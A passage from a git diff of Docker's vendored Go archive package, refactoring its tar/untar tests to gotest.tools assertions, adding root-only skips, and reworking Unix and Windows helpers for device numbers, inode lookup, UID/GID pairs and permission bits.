!= nil { t.Fatal(err) } @@ -273,9 +265,7 @@ func TestCmdStreamGood(t *testing.T) { func TestUntarPathWithInvalidDest(t *testing.T) { tempFolder, err := ioutil.TempDir("", "docker-archive-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(tempFolder) invalidDestFolder := filepath.Join(tempFolder, "invalidDest") // Create a src file @@ -294,11 +284,9 @@ func TestUntarPathWithInvalidDest(t *testing.T) { cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU) _, err = cmd.CombinedOutput() - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - err = UntarPath(tarFile, invalidDestFolder) + err = defaultUntarPath(tarFile, invalidDestFolder) if err == nil { t.Fatalf("UntarPath with invalid destination path should throw an error.") } @@ -310,17 +298,16 @@ func TestUntarPathWithInvalidSrc(t *testing.T) { t.Fatalf("Fail to create the destination file") } defer os.RemoveAll(dest) - err = UntarPath("/invalid/path", dest) + err = defaultUntarPath("/invalid/path", dest) if err == nil { t.Fatalf("UntarPath with invalid src path should throw an error.") } } func TestUntarPath(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpFolder, err := ioutil.TempDir("", "docker-archive-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(tmpFolder) srcFile := filepath.Join(tmpFolder, "src") tarFile := filepath.Join(tmpFolder, "src.tar") @@ -341,11 +328,9 @@ func TestUntarPath(t *testing.T) { } cmd := exec.Command("sh", "-c", "tar cf "+tarFileU+" "+srcFileU) _, err = cmd.CombinedOutput() - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - err = UntarPath(tarFile, destFolder) + err = defaultUntarPath(tarFile, destFolder) if err != nil { t.Fatalf("UntarPath shouldn't throw an error, %s.", err) } @@ -384,7 +369,7 @@ func TestUntarPathWithDestinationFile(t *testing.T) { if err != nil { t.Fatalf("Fail to create the destination file") } - err = 
UntarPath(tarFile, destFile) + err = defaultUntarPath(tarFile, destFile) if err == nil { t.Fatalf("UntarPath should throw an error if the destination if a file") } @@ -427,7 +412,7 @@ func TestUntarPathWithDestinationSrcFileAsFolder(t *testing.T) { if err != nil { t.Fatal(err) } - err = UntarPath(tarFile, destFolder) + err = defaultUntarPath(tarFile, destFolder) if err != nil { t.Fatalf("UntarPath should throw not throw an error if the extracted file already exists and is a folder") } @@ -444,13 +429,14 @@ func TestCopyWithTarInvalidSrc(t *testing.T) { if err != nil { t.Fatal(err) } - err = CopyWithTar(invalidSrc, destFolder) + err = defaultCopyWithTar(invalidSrc, destFolder) if err == nil { t.Fatalf("archiver.CopyWithTar with invalid src path should throw an error.") } } func TestCopyWithTarInexistentDestWillCreateIt(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tempFolder, err := ioutil.TempDir("", "docker-archive-test") if err != nil { t.Fatal(nil) @@ -461,7 +447,7 @@ func TestCopyWithTarInexistentDestWillCreateIt(t *testing.T) { if err != nil { t.Fatal(err) } - err = CopyWithTar(srcFolder, inexistentDestFolder) + err = defaultCopyWithTar(srcFolder, inexistentDestFolder) if err != nil { t.Fatalf("CopyWithTar with an inexistent folder shouldn't fail.") } @@ -490,7 +476,7 @@ func TestCopyWithTarSrcFile(t *testing.T) { t.Fatal(err) } ioutil.WriteFile(src, []byte("content"), 0777) - err = CopyWithTar(src, dest) + err = defaultCopyWithTar(src, dest) if err != nil { t.Fatalf("archiver.CopyWithTar shouldn't throw an error, %s.", err) } @@ -519,7 +505,7 @@ func TestCopyWithTarSrcFolder(t *testing.T) { t.Fatal(err) } ioutil.WriteFile(filepath.Join(src, "file"), []byte("content"), 0777) - err = CopyWithTar(src, dest) + err = defaultCopyWithTar(src, dest) if err != nil { t.Fatalf("archiver.CopyWithTar shouldn't throw an error, %s.", err) } @@ -542,7 +528,7 @@ func TestCopyFileWithTarInvalidSrc(t *testing.T) { t.Fatal(err) } invalidFile 
:= filepath.Join(tempFolder, "doesnotexists") - err = CopyFileWithTar(invalidFile, destFolder) + err = defaultCopyFileWithTar(invalidFile, destFolder) if err == nil { t.Fatalf("archiver.CopyWithTar with invalid src path should throw an error.") } @@ -560,7 +546,7 @@ func TestCopyFileWithTarInexistentDestWillCreateIt(t *testing.T) { if err != nil { t.Fatal(err) } - err = CopyFileWithTar(srcFile, inexistentDestFolder) + err = defaultCopyFileWithTar(srcFile, inexistentDestFolder) if err != nil { t.Fatalf("CopyWithTar with an inexistent folder shouldn't fail.") } @@ -587,7 +573,7 @@ func TestCopyFileWithTarSrcFolder(t *testing.T) { if err != nil { t.Fatal(err) } - err = CopyFileWithTar(src, dest) + err = defaultCopyFileWithTar(src, dest) if err == nil { t.Fatalf("CopyFileWithTar should throw an error with a folder.") } @@ -611,7 +597,7 @@ func TestCopyFileWithTarSrcFile(t *testing.T) { t.Fatal(err) } ioutil.WriteFile(src, []byte("content"), 0777) - err = CopyWithTar(src, dest+"/") + err = defaultCopyWithTar(src, dest+"/") if err != nil { t.Fatalf("archiver.CopyFileWithTar shouldn't throw an error, %s.", err) } @@ -654,7 +640,7 @@ func checkNoChanges(fileNum int, hardlinks bool) error { return err } - err = TarUntar(srcDir, destDir) + err = defaultTarUntar(srcDir, destDir) if err != nil { return err } @@ -742,6 +728,57 @@ func TestTarUntar(t *testing.T) { } } +func TestTarWithOptionsChownOptsAlwaysOverridesIdPair(t *testing.T) { + origin, err := ioutil.TempDir("", "docker-test-tar-chown-opt") + assert.NilError(t, err) + + defer os.RemoveAll(origin) + filePath := filepath.Join(origin, "1") + err = ioutil.WriteFile(filePath, []byte("hello world"), 0700) + assert.NilError(t, err) + + idMaps := []idtools.IDMap{ + 0: { + ContainerID: 0, + HostID: 0, + Size: 65536, + }, + 1: { + ContainerID: 0, + HostID: 100000, + Size: 65536, + }, + } + + cases := []struct { + opts *TarOptions + expectedUID int + expectedGID int + }{ + {&TarOptions{ChownOpts: &idtools.IDPair{UID: 1337, GID: 
42}}, 1337, 42}, + {&TarOptions{ChownOpts: &idtools.IDPair{UID: 100001, GID: 100001}, UIDMaps: idMaps, GIDMaps: idMaps}, 100001, 100001}, + {&TarOptions{ChownOpts: &idtools.IDPair{UID: 0, GID: 0}, NoLchown: false}, 0, 0}, + {&TarOptions{ChownOpts: &idtools.IDPair{UID: 1, GID: 1}, NoLchown: true}, 1, 1}, + {&TarOptions{ChownOpts: &idtools.IDPair{UID: 1000, GID: 1000}, NoLchown: true}, 1000, 1000}, + } + for _, testCase := range cases { + reader, err := TarWithOptions(filePath, testCase.opts) + assert.NilError(t, err) + tr := tar.NewReader(reader) + defer reader.Close() + for { + hdr, err := tr.Next() + if err == io.EOF { + // end of tar archive + break + } + assert.NilError(t, err) + assert.Check(t, is.Equal(hdr.Uid, testCase.expectedUID), "Uid equals expected value") + assert.Check(t, is.Equal(hdr.Gid, testCase.expectedGID), "Gid equals expected value") + } + } +} + func TestTarWithOptions(t *testing.T) { // TODO Windows: Figure out how to fix this test. if runtime.GOOS == "windows" { @@ -868,7 +905,7 @@ func BenchmarkTarUntar(b *testing.B) { b.ResetTimer() b.SetBytes(int64(n)) for n := 0; n < b.N; n++ { - err := TarUntar(origin, target) + err := defaultTarUntar(origin, target) if err != nil { b.Fatal(err) } @@ -896,7 +933,7 @@ func BenchmarkTarUntarWithLinks(b *testing.B) { b.ResetTimer() b.SetBytes(int64(n)) for n := 0; n < b.N; n++ { - err := TarUntar(origin, target) + err := defaultTarUntar(origin, target) if err != nil { b.Fatal(err) } @@ -934,9 +971,8 @@ func TestUntarInvalidFilenames(t *testing.T) { func TestUntarHardlinkToSymlink(t *testing.T) { // TODO Windows. 
There may be a way of running this, but turning off for now - if runtime.GOOS == "windows" { - t.Skip("hardlinks on Windows") - } + skip.If(t, runtime.GOOS == "windows", "hardlinks on Windows") + skip.If(t, os.Getuid() != 0, "skipping test that requires root") for i, headers := range [][]*tar.Header{ { { @@ -1149,8 +1185,10 @@ func TestUntarInvalidSymlink(t *testing.T) { func TestTempArchiveCloseMultipleTimes(t *testing.T) { reader := ioutil.NopCloser(strings.NewReader("hello")) tempArchive, err := NewTempArchive(reader, "") + assert.NilError(t, err) buf := make([]byte, 10) n, err := tempArchive.Read(buf) + assert.NilError(t, err) if n != 5 { t.Fatalf("Expected to read 5 bytes. Read %d instead", n) } @@ -1160,3 +1198,167 @@ func TestTempArchiveCloseMultipleTimes(t *testing.T) { } } } + +func TestReplaceFileTarWrapper(t *testing.T) { + filesInArchive := 20 + testcases := []struct { + doc string + filename string + modifier TarModifierFunc + expected string + fileCount int + }{ + { + doc: "Modifier creates a new file", + filename: "newfile", + modifier: createModifier(t), + expected: "the new content", + fileCount: filesInArchive + 1, + }, + { + doc: "Modifier replaces a file", + filename: "file-2", + modifier: createOrReplaceModifier, + expected: "the new content", + fileCount: filesInArchive, + }, + { + doc: "Modifier replaces the last file", + filename: fmt.Sprintf("file-%d", filesInArchive-1), + modifier: createOrReplaceModifier, + expected: "the new content", + fileCount: filesInArchive, + }, + { + doc: "Modifier appends to a file", + filename: "file-3", + modifier: appendModifier, + expected: "fooo\nnext line", + fileCount: filesInArchive, + }, + } + + for _, testcase := range testcases { + sourceArchive, cleanup := buildSourceArchive(t, filesInArchive) + defer cleanup() + + resultArchive := ReplaceFileTarWrapper( + sourceArchive, + map[string]TarModifierFunc{testcase.filename: testcase.modifier}) + + actual := readFileFromArchive(t, resultArchive, 
testcase.filename, testcase.fileCount, testcase.doc) + assert.Check(t, is.Equal(testcase.expected, actual), testcase.doc) + } +} + +// TestPrefixHeaderReadable tests that files that could be created with the +// version of this package that was built with <=go17 are still readable. +func TestPrefixHeaderReadable(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") + // https://gist.github.com/stevvooe/e2a790ad4e97425896206c0816e1a882#file-out-go + var testFile = []byte("\x1f\x8b\x08\x08\x44\x21\x68\x59\x00\x03\x74\x2e\x74\x61\x72\x00\x4b\xcb\xcf\x67\xa0\x35\x30\x80\x00\x86\x06\x10\x47\x01\xc1\x37\x40\x00\x54\xb6\xb1\xa1\xa9\x99\x09\x48\x25\x1d\x40\x69\x71\x49\x62\x91\x02\xe5\x76\xa1\x79\x84\x21\x91\xd6\x80\x72\xaf\x8f\x82\x51\x30\x0a\x46\x36\x00\x00\xf0\x1c\x1e\x95\x00\x06\x00\x00") + + tmpDir, err := ioutil.TempDir("", "prefix-test") + assert.NilError(t, err) + defer os.RemoveAll(tmpDir) + err = Untar(bytes.NewReader(testFile), tmpDir, nil) + assert.NilError(t, err) + + baseName := "foo" + pth := strings.Repeat("a", 100-len(baseName)) + "/" + baseName + + _, err = os.Lstat(filepath.Join(tmpDir, pth)) + assert.NilError(t, err) +} + +func buildSourceArchive(t *testing.T, numberOfFiles int) (io.ReadCloser, func()) { + srcDir, err := ioutil.TempDir("", "docker-test-srcDir") + assert.NilError(t, err) + + _, err = prepareUntarSourceDirectory(numberOfFiles, srcDir, false) + assert.NilError(t, err) + + sourceArchive, err := TarWithOptions(srcDir, &TarOptions{}) + assert.NilError(t, err) + return sourceArchive, func() { + os.RemoveAll(srcDir) + sourceArchive.Close() + } +} + +func createOrReplaceModifier(path string, header *tar.Header, content io.Reader) (*tar.Header, []byte, error) { + return &tar.Header{ + Mode: 0600, + Typeflag: tar.TypeReg, + }, []byte("the new content"), nil +} + +func createModifier(t *testing.T) TarModifierFunc { + return func(path string, header *tar.Header, content io.Reader) (*tar.Header, []byte, error) { + 
assert.Check(t, is.Nil(content)) + return createOrReplaceModifier(path, header, content) + } +} + +func appendModifier(path string, header *tar.Header, content io.Reader) (*tar.Header, []byte, error) { + buffer := bytes.Buffer{} + if content != nil { + if _, err := buffer.ReadFrom(content); err != nil { + return nil, nil, err + } + } + buffer.WriteString("\nnext line") + return &tar.Header{Mode: 0600, Typeflag: tar.TypeReg}, buffer.Bytes(), nil +} + +func readFileFromArchive(t *testing.T, archive io.ReadCloser, name string, expectedCount int, doc string) string { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") + destDir, err := ioutil.TempDir("", "docker-test-destDir") + assert.NilError(t, err) + defer os.RemoveAll(destDir) + + err = Untar(archive, destDir, nil) + assert.NilError(t, err) + + files, _ := ioutil.ReadDir(destDir) + assert.Check(t, is.Len(files, expectedCount), doc) + + content, err := ioutil.ReadFile(filepath.Join(destDir, name)) + assert.Check(t, err) + return string(content) +} + +func TestDisablePigz(t *testing.T) { + _, err := exec.LookPath("unpigz") + if err != nil { + t.Log("Test will not check full path when Pigz not installed") + } + + os.Setenv("MOBY_DISABLE_PIGZ", "true") + defer os.Unsetenv("MOBY_DISABLE_PIGZ") + + r := testDecompressStream(t, "gz", "gzip -f") + // For the bufio pool + outsideReaderCloserWrapper := r.(*ioutils.ReadCloserWrapper) + // For the context canceller + contextReaderCloserWrapper := outsideReaderCloserWrapper.Reader.(*ioutils.ReadCloserWrapper) + + assert.Equal(t, reflect.TypeOf(contextReaderCloserWrapper.Reader), reflect.TypeOf(&gzip.Reader{})) +} + +func TestPigz(t *testing.T) { + r := testDecompressStream(t, "gz", "gzip -f") + // For the bufio pool + outsideReaderCloserWrapper := r.(*ioutils.ReadCloserWrapper) + // For the context canceller + contextReaderCloserWrapper := outsideReaderCloserWrapper.Reader.(*ioutils.ReadCloserWrapper) + + _, err := exec.LookPath("unpigz") + if err == nil { + 
t.Log("Tested whether Pigz is used, as it installed") + assert.Equal(t, reflect.TypeOf(contextReaderCloserWrapper.Reader), reflect.TypeOf(&io.PipeReader{})) + } else { + t.Log("Tested whether Pigz is not used, as it not installed") + assert.Equal(t, reflect.TypeOf(contextReaderCloserWrapper.Reader), reflect.TypeOf(&gzip.Reader{})) + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_unix.go b/vendor/github.com/docker/docker/pkg/archive/archive_unix.go index 7083f2fa53..e81076c170 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_unix.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_unix.go @@ -1,6 +1,6 @@ // +build !windows -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" @@ -9,8 +9,10 @@ import ( "path/filepath" "syscall" + "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/system" rsystem "github.com/opencontainers/runc/libcontainer/system" + "golang.org/x/sys/unix" ) // fixVolumePathPrefix does platform specific processing to ensure that if @@ -41,41 +43,38 @@ func chmodTarEntry(perm os.FileMode) os.FileMode { return perm // noop for unix as golang APIs provide perm bits correctly } -func setHeaderForSpecialDevice(hdr *tar.Header, ta *tarAppender, name string, stat interface{}) (inode uint64, err error) { +func setHeaderForSpecialDevice(hdr *tar.Header, name string, stat interface{}) (err error) { s, ok := stat.(*syscall.Stat_t) - if !ok { - err = errors.New("cannot convert stat value to syscall.Stat_t") - return + if ok { + // Currently go does not fill in the major/minors + if s.Mode&unix.S_IFBLK != 0 || + s.Mode&unix.S_IFCHR != 0 { + hdr.Devmajor = int64(unix.Major(uint64(s.Rdev))) // nolint: unconvert + hdr.Devminor = int64(unix.Minor(uint64(s.Rdev))) // nolint: unconvert + } } - inode = uint64(s.Ino) + return +} + +func getInodeFromStat(stat interface{}) (inode uint64, err error) { + s, ok := stat.(*syscall.Stat_t) - // Currently go does 
not fill in the major/minors - if s.Mode&syscall.S_IFBLK != 0 || - s.Mode&syscall.S_IFCHR != 0 { - hdr.Devmajor = int64(major(uint64(s.Rdev))) - hdr.Devminor = int64(minor(uint64(s.Rdev))) + if ok { + inode = s.Ino } return } -func getFileUIDGID(stat interface{}) (int, int, error) { +func getFileUIDGID(stat interface{}) (idtools.IDPair, error) { s, ok := stat.(*syscall.Stat_t) if !ok { - return -1, -1, errors.New("cannot convert stat value to syscall.Stat_t") + return idtools.IDPair{}, errors.New("cannot convert stat value to syscall.Stat_t") } - return int(s.Uid), int(s.Gid), nil -} - -func major(device uint64) uint64 { - return (device >> 8) & 0xfff -} - -func minor(device uint64) uint64 { - return (device & 0xff) | ((device >> 12) & 0xfff00) + return idtools.IDPair{UID: int(s.Uid), GID: int(s.Gid)}, nil } // handleTarTypeBlockCharFifo is an OS-specific helper function used by @@ -89,17 +88,14 @@ func handleTarTypeBlockCharFifo(hdr *tar.Header, path string) error { mode := uint32(hdr.Mode & 07777) switch hdr.Typeflag { case tar.TypeBlock: - mode |= syscall.S_IFBLK + mode |= unix.S_IFBLK case tar.TypeChar: - mode |= syscall.S_IFCHR + mode |= unix.S_IFCHR case tar.TypeFifo: - mode |= syscall.S_IFIFO + mode |= unix.S_IFIFO } - if err := system.Mknod(path, mode, int(system.Mkdev(hdr.Devmajor, hdr.Devminor))); err != nil { - return err - } - return nil + return system.Mknod(path, mode, int(system.Mkdev(hdr.Devmajor, hdr.Devminor))) } func handleLChmod(hdr *tar.Header, path string, hdrInfo os.FileInfo) error { diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go index 4eeafdd128..808878d094 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go @@ -1,6 +1,6 @@ // +build !windows -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "bytes" @@ -8,11 
+8,15 @@ import ( "io/ioutil" "os" "path/filepath" - "runtime" + "strings" "syscall" "testing" "github.com/docker/docker/pkg/system" + "golang.org/x/sys/unix" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" ) func TestCanonicalTarNameForPath(t *testing.T) { @@ -69,60 +73,89 @@ func TestChmodTarEntry(t *testing.T) { func TestTarWithHardLink(t *testing.T) { origin, err := ioutil.TempDir("", "docker-test-tar-hardlink") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(origin) - if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { - t.Fatal(err) - } - if err := os.Link(filepath.Join(origin, "1"), filepath.Join(origin, "2")); err != nil { - t.Fatal(err) - } + + err = ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700) + assert.NilError(t, err) + + err = os.Link(filepath.Join(origin, "1"), filepath.Join(origin, "2")) + assert.NilError(t, err) var i1, i2 uint64 - if i1, err = getNlink(filepath.Join(origin, "1")); err != nil { - t.Fatal(err) - } + i1, err = getNlink(filepath.Join(origin, "1")) + assert.NilError(t, err) + // sanity check that we can hardlink if i1 != 2 { t.Skipf("skipping since hardlinks don't work here; expected 2 links, got %d", i1) } dest, err := ioutil.TempDir("", "docker-test-tar-hardlink-dest") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(dest) // we'll do this in two steps to separate failure fh, err := Tar(origin, Uncompressed) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) // ensure we can read the whole thing with no error, before writing back out buf, err := ioutil.ReadAll(fh) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) bRdr := bytes.NewReader(buf) err = Untar(bRdr, dest, &TarOptions{Compression: Uncompressed}) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - if i1, err = getInode(filepath.Join(dest, "1")); err != nil { - t.Fatal(err) 
- } - if i2, err = getInode(filepath.Join(dest, "2")); err != nil { - t.Fatal(err) - } + i1, err = getInode(filepath.Join(dest, "1")) + assert.NilError(t, err) - if i1 != i2 { - t.Errorf("expected matching inodes, but got %d and %d", i1, i2) + i2, err = getInode(filepath.Join(dest, "2")) + assert.NilError(t, err) + + assert.Check(t, is.Equal(i1, i2)) +} + +func TestTarWithHardLinkAndRebase(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "docker-test-tar-hardlink-rebase") + assert.NilError(t, err) + defer os.RemoveAll(tmpDir) + + origin := filepath.Join(tmpDir, "origin") + err = os.Mkdir(origin, 0700) + assert.NilError(t, err) + + err = ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700) + assert.NilError(t, err) + + err = os.Link(filepath.Join(origin, "1"), filepath.Join(origin, "2")) + assert.NilError(t, err) + + var i1, i2 uint64 + i1, err = getNlink(filepath.Join(origin, "1")) + assert.NilError(t, err) + + // sanity check that we can hardlink + if i1 != 2 { + t.Skipf("skipping since hardlinks don't work here; expected 2 links, got %d", i1) } + + dest := filepath.Join(tmpDir, "dest") + bRdr, err := TarResourceRebase(origin, "origin") + assert.NilError(t, err) + + dstDir, srcBase := SplitPathDirEntry(origin) + _, dstBase := SplitPathDirEntry(dest) + content := RebaseArchiveEntries(bRdr, srcBase, dstBase) + err = Untar(content, dstDir, &TarOptions{Compression: Uncompressed, NoLchown: true, NoOverwriteDirNonDir: true}) + assert.NilError(t, err) + + i1, err = getInode(filepath.Join(dest, "1")) + assert.NilError(t, err) + i2, err = getInode(filepath.Join(dest, "2")) + assert.NilError(t, err) + + assert.Check(t, is.Equal(i1, i2)) } func getNlink(path string) (uint64, error) { @@ -151,52 +184,40 @@ func getInode(path string) (uint64, error) { } func TestTarWithBlockCharFifo(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") origin, err := ioutil.TempDir("", "docker-test-tar-hardlink") - if err != nil { - 
t.Fatal(err) - } + assert.NilError(t, err) + defer os.RemoveAll(origin) - if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { - t.Fatal(err) - } - if err := system.Mknod(filepath.Join(origin, "2"), syscall.S_IFBLK, int(system.Mkdev(int64(12), int64(5)))); err != nil { - t.Fatal(err) - } - if err := system.Mknod(filepath.Join(origin, "3"), syscall.S_IFCHR, int(system.Mkdev(int64(12), int64(5)))); err != nil { - t.Fatal(err) - } - if err := system.Mknod(filepath.Join(origin, "4"), syscall.S_IFIFO, int(system.Mkdev(int64(12), int64(5)))); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700) + assert.NilError(t, err) + + err = system.Mknod(filepath.Join(origin, "2"), unix.S_IFBLK, int(system.Mkdev(int64(12), int64(5)))) + assert.NilError(t, err) + err = system.Mknod(filepath.Join(origin, "3"), unix.S_IFCHR, int(system.Mkdev(int64(12), int64(5)))) + assert.NilError(t, err) + err = system.Mknod(filepath.Join(origin, "4"), unix.S_IFIFO, int(system.Mkdev(int64(12), int64(5)))) + assert.NilError(t, err) dest, err := ioutil.TempDir("", "docker-test-tar-hardlink-dest") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(dest) // we'll do this in two steps to separate failure fh, err := Tar(origin, Uncompressed) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) // ensure we can read the whole thing with no error, before writing back out buf, err := ioutil.ReadAll(fh) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) bRdr := bytes.NewReader(buf) err = Untar(bRdr, dest, &TarOptions{Compression: Uncompressed}) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) changes, err := ChangesDirs(origin, dest) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + if len(changes) > 0 { t.Fatalf("Tar with special device (block, char, fifo) should keep them (recreate them when untar) : %v", changes) } @@ 
-204,26 +225,19 @@ func TestTarWithBlockCharFifo(t *testing.T) { // TestTarUntarWithXattr is Unix as Lsetxattr is not supported on Windows func TestTarUntarWithXattr(t *testing.T) { - if runtime.GOOS == "solaris" { - t.Skip() - } + skip.If(t, os.Getuid() != 0, "skipping test that requires root") origin, err := ioutil.TempDir("", "docker-test-untar-origin") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(origin) - if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { - t.Fatal(err) - } - if err := ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700); err != nil { - t.Fatal(err) - } - if err := ioutil.WriteFile(filepath.Join(origin, "3"), []byte("will be ignored"), 0700); err != nil { - t.Fatal(err) - } - if err := system.Lsetxattr(filepath.Join(origin, "2"), "security.capability", []byte{0x00}, 0); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700) + assert.NilError(t, err) + + err = ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700) + assert.NilError(t, err) + err = ioutil.WriteFile(filepath.Join(origin, "3"), []byte("will be ignored"), 0700) + assert.NilError(t, err) + err = system.Lsetxattr(filepath.Join(origin, "2"), "security.capability", []byte{0x00}, 0) + assert.NilError(t, err) for _, c := range []Compression{ Uncompressed, @@ -247,3 +261,58 @@ func TestTarUntarWithXattr(t *testing.T) { } } } + +func TestCopyInfoDestinationPathSymlink(t *testing.T) { + tmpDir, _ := getTestTempDirs(t) + defer removeAllPaths(tmpDir) + + root := strings.TrimRight(tmpDir, "/") + "/" + + type FileTestData struct { + resource FileData + file string + expected CopyInfo + } + + testData := []FileTestData{ + //Create a directory: /tmp/archive-copy-test*/dir1 + //Test will "copy" file1 to dir1 + {resource: FileData{filetype: Dir, path: "dir1", permissions: 0740}, file: "file1", expected: CopyInfo{Path: root + 
"dir1/file1", Exists: false, IsDir: false}}, + + //Create a symlink directory to dir1: /tmp/archive-copy-test*/dirSymlink -> dir1 + //Test will "copy" file2 to dirSymlink + {resource: FileData{filetype: Symlink, path: "dirSymlink", contents: root + "dir1", permissions: 0600}, file: "file2", expected: CopyInfo{Path: root + "dirSymlink/file2", Exists: false, IsDir: false}}, + + //Create a file in tmp directory: /tmp/archive-copy-test*/file1 + //Test to cover when the full file path already exists. + {resource: FileData{filetype: Regular, path: "file1", permissions: 0600}, file: "", expected: CopyInfo{Path: root + "file1", Exists: true}}, + + //Create a directory: /tmp/archive-copy*/dir2 + //Test to cover when the full directory path already exists + {resource: FileData{filetype: Dir, path: "dir2", permissions: 0740}, file: "", expected: CopyInfo{Path: root + "dir2", Exists: true, IsDir: true}}, + + //Create a symlink to a non-existent target: /tmp/archive-copy*/symlink1 -> noSuchTarget + //Negative test to cover symlinking to a target that does not exit + {resource: FileData{filetype: Symlink, path: "symlink1", contents: "noSuchTarget", permissions: 0600}, file: "", expected: CopyInfo{Path: root + "noSuchTarget", Exists: false}}, + + //Create a file in tmp directory for next test: /tmp/existingfile + {resource: FileData{filetype: Regular, path: "existingfile", permissions: 0600}, file: "", expected: CopyInfo{Path: root + "existingfile", Exists: true}}, + + //Create a symlink to an existing file: /tmp/archive-copy*/symlink2 -> /tmp/existingfile + //Test to cover when the parent directory of a new file is a symlink + {resource: FileData{filetype: Symlink, path: "symlink2", contents: "existingfile", permissions: 0600}, file: "", expected: CopyInfo{Path: root + "existingfile", Exists: true}}, + } + + var dirs []FileData + for _, data := range testData { + dirs = append(dirs, data.resource) + } + provisionSampleDir(t, tmpDir, dirs) + + for _, info := range testData { + p 
:= filepath.Join(tmpDir, info.resource.path, info.file) + ci, err := CopyInfoDestinationPath(p) + assert.Check(t, err) + assert.Check(t, is.DeepEqual(info.expected, ci)) + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_windows.go b/vendor/github.com/docker/docker/pkg/archive/archive_windows.go index 5c3a1be340..69aadd823c 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_windows.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" @@ -9,6 +7,7 @@ import ( "path/filepath" "strings" + "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/longpath" ) @@ -42,15 +41,23 @@ func CanonicalTarNameForPath(p string) (string, error) { // chmodTarEntry is used to adjust the file permissions used in tar header based // on the platform the archival is done. func chmodTarEntry(perm os.FileMode) os.FileMode { - perm &= 0755 + //perm &= 0755 // this 0-ed out tar flags (like link, regular file, directory marker etc.) + permPart := perm & os.ModePerm + noPermPart := perm &^ os.ModePerm // Add the x bit: make everything +x from windows - perm |= 0111 + permPart |= 0111 + permPart &= 0755 + + return noPermPart | permPart +} - return perm +func setHeaderForSpecialDevice(hdr *tar.Header, name string, stat interface{}) (err error) { + // do nothing. no notion of Rdev, Nlink in stat on Windows + return } -func setHeaderForSpecialDevice(hdr *tar.Header, ta *tarAppender, name string, stat interface{}) (inode uint64, err error) { - // do nothing. no notion of Rdev, Inode, Nlink in stat on Windows +func getInodeFromStat(stat interface{}) (inode uint64, err error) { + // do nothing. 
no notion of Inode in stat on Windows return } @@ -64,7 +71,7 @@ func handleLChmod(hdr *tar.Header, path string, hdrInfo os.FileInfo) error { return nil } -func getFileUIDGID(stat interface{}) (int, int, error) { +func getFileUIDGID(stat interface{}) (idtools.IDPair, error) { // no notion of file ownership mapping yet on Windows - return 0, 0, nil + return idtools.IDPair{UID: 0, GID: 0}, nil } diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go index 0c6733d6bd..b3dbb32754 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go @@ -1,6 +1,6 @@ // +build windows -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "io/ioutil" @@ -27,7 +27,7 @@ func TestCopyFileWithInvalidDest(t *testing.T) { t.Fatal(err) } ioutil.WriteFile(src, []byte("content"), 0777) - err = CopyWithTar(src, dest) + err = defaultCopyWithTar(src, dest) if err == nil { t.Fatalf("archiver.CopyWithTar should throw an error on invalid dest.") } @@ -82,6 +82,8 @@ func TestChmodTarEntry(t *testing.T) { {0644, 0755}, {0755, 0755}, {0444, 0555}, + {0755 | os.ModeDir, 0755 | os.ModeDir}, + {0755 | os.ModeSymlink, 0755 | 